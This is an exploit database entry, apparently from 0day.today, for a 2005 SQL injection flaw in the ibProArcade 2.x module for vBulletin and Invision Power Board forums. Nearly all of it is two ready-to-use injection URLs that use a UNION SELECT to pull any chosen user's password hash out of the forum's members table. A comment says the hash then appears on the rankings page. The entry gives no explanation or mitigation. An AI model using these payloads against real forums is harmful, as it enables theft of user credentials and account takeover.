id: 195
date: 11/06/2005
title: ibProArcade 2.x module (vBulletin/IPB) Remote SQL Injection Exploit
author: B~HFH
cves: 

===================================================================
ibProArcade 2.x module (vBulletin/IPB) Remote SQL Injection Exploit
===================================================================




# Rankings for (name) will state the md5 hash for the user /str0ke

# ibProArcade 2.x

IPB:

index.php?act=Arcade&module=report&user=-1 union select password from ibf_members where id=[any_user]

vBulettin forums:

index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]




#  0day.today [2023-03-22]  #